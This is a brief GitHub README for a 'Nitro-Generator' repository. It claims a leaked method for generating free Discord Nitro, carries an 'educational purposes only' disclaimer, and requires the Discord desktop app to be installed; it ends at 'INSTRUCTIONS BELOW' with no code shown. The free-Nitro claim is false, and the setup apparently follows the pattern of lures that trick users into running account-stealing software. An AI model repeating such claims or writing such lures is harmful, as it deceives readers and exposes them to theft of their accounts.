vlorb/Nitro-Generator/README.md

 New method leaked for generating Discord Nitro.
 Educational purposes only I do not condone any cheating this is briefly for educational purposes on how to improve your software.

+MAKE SURE YOU HAVE THE DISCORD APP INSTALLED IT WILL NOT WORK IF YOU USE THE DISCORD BROWSER VERSION TO INSTALL THE DISCORD APP GO TO https://discord.com/api/download?platform=win

 INSTRUCTIONS BELOW